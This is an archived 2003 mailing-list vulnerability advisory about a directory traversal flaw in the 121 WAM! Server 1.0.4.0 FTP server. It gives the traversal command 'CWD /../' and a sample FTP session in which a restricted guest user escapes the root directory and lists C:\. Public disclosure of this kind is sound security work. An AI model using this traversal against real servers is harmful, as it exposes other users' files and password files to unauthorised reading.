[VulnWatch] Directory Traversal Vulnerability in 121 WAM! Server 1.0.4.0

• Previous message: loper_at_hushmail.com: "[VulnWatch] Local ZoneAlarm Firewall (probably all versions - tested on v3.1)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: vulnwatch@vulnwatch.org, vuln@secunia.com, bugs@securitytracker.com
Date: Wed, 06 Aug 2003 19:41:13 +0000

Directory Traversal Vulnerability in 121 WAM! Server 1.0.4.0

Url: http://www.121software.com/121wam/server.asp

"Imagine if you could centralise the management of your FTP server farm and
give customers additional database management capability."

"121 WAM! Server is a standard FTP server for Microsoft Windows. When used
in
conjunction with 121 WAM! Client, it also provides your users with a
complete solution to manage their online databases including Microsoft
Access,
SQL Server and MySQL. 121 WAM! makes uploading, downloading and transferring
data a simple drag and drop operation. 121 WAM! Server is the first FTP
server
that supports database transfer functionality."
- From the Vendor's Website

It is possible to leave the root directory assigned to a resitricted
username
and download any file on the remote computer.
This can include, but is not limited to, the files of other users, and
password files on the main server.

Sending the command:

CWD ..

Will not change the directory, however:

CWD /../

Will allow a restricted user to 'hop' out of the pre-definied user root
directory, and browse the hard drive.

Sample Session:
===============
[ First I log in under 'guest', confined to directory 'c:\root' ]

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ftp 82.35.22.2
Connected to 82.35.22.2.
220- ***** ***** ***** *****
220- 121 WAM! Server Version 1. 0. 4. 0
220- Get 121 WAM! Client for extra functionalities
220- such as database operations
220- Check out http://www.121software.com
220- ***** ***** ***** *****
220 Welcome to 121 WAM! Server
User (82.35.22.2:(none)): guest
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> dir
200 Port command ok.
150 Ready to transfer data.
drwx------ 2 owner nogroup 0 May 21 13:46 repd
-rwx------ 1 owner nogroup 10462 May 17 21:13 help.htm
-rwx------ 1 owner nogroup 75264 May 18 14:39 ralf4.exe
-rwx------ 1 owner nogroup 805 May 17 16:20 README.txt
-rwx------ 1 owner nogroup 439 May 17 15:32 SETUP.bat
drwx------ 2 owner nogroup 0 Jun 05 23:32 conf
drwx------ 2 owner nogroup 0 Jun 06 00:11 docs
drwx------ 2 owner nogroup 0 Jun 18 23:20 images
226 File transfer complete.
ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.
ftp> cd ..
250 CWD command completed successfully.
ftp> dir
200 Port command ok.
150 Ready to transfer data.
drwx------ 2 owner nogroup 0 May 21 13:46 repd
-rwx------ 1 owner nogroup 10462 May 17 21:13 help.htm
-rwx------ 1 owner nogroup 75264 May 18 14:39 ralf4.exe
-rwx------ 1 owner nogroup 805 May 17 16:20 README.txt
-rwx------ 1 owner nogroup 439 May 17 15:32 SETUP.bat
drwx------ 2 owner nogroup 0 Jun 05 23:32 conf
drwx------ 2 owner nogroup 0 Jun 06 00:11 docs
drwx------ 2 owner nogroup 0 Jun 18 23:20 images
226 File transfer complete.
ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.

[ As you can see, a regular 'cd ..' won't allow me to leave my root dir. ]

ftp> cd /../
250 CWD command completed successfully.
ftp> dir
200 Port command ok.
150 Ready to transfer data.
drwx------ 2 owner nogroup 0 May 10 16:18 WARM
drwx------ 2 owner nogroup 0 Jul 15 2002 WINDOWS
drwx------ 2 owner nogroup 0 Jul 15 2002 Documents and
Settings
[snip ...]
drwx------ 2 owner nogroup 0 Jul 15 2002 Program Files
-rwx------ 1 owner nogroup 0 Jul 15 2002 CONFIG.SYS
-r-x------ 1 owner nogroup 5517 Jul 15 2002 CLDMA.LOG
-rwx------ 1 owner nogroup 0 Jul 31 2002 CONFIG.WIN
drwx------ 2 owner nogroup 0 Sep 28 2002 perlsetup
[snip ...]
drwx------ 2 owner nogroup 0 Jul 24 20:48 cygwin
-rwx------ 1 owner nogroup 475136 Aug 29 2002 ASMEDIT
-rwx------ 1 owner nogroup 17091 Sep 02 2002 gddreleasetemp
226 File transfer complete.
ftp: 17589 bytes received in 0.22Seconds 80.32Kbytes/sec.
ftp>

[ However, the 'cd /../' command got me straight to 'c:\'! ]

======================================================================

Operating system and servicepack level:
Windows 9x/Me/NT Based

Software:
121 WAM! Server 1.0.4.0 (Possibly previous versions)

Under what circumstances the vulnerability was discovered:
Under a vulnerability search.

If the vendor has been notified:
Yes, I think we can expect a patch some day soon :o)

How to contact you for further information:
I can always be reached at peter4020@hotmail.com

Please credit this find to:
Peter Winter-Smith

Thank you for your time,
-Peter

_________________________________________________________________
Hotmail messages direct to your mobile phone http://www.msn.co.uk/msnmobile

• Previous message: loper_at_hushmail.com: "[VulnWatch] Local ZoneAlarm Firewall (probably all versions - tested on v3.1)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]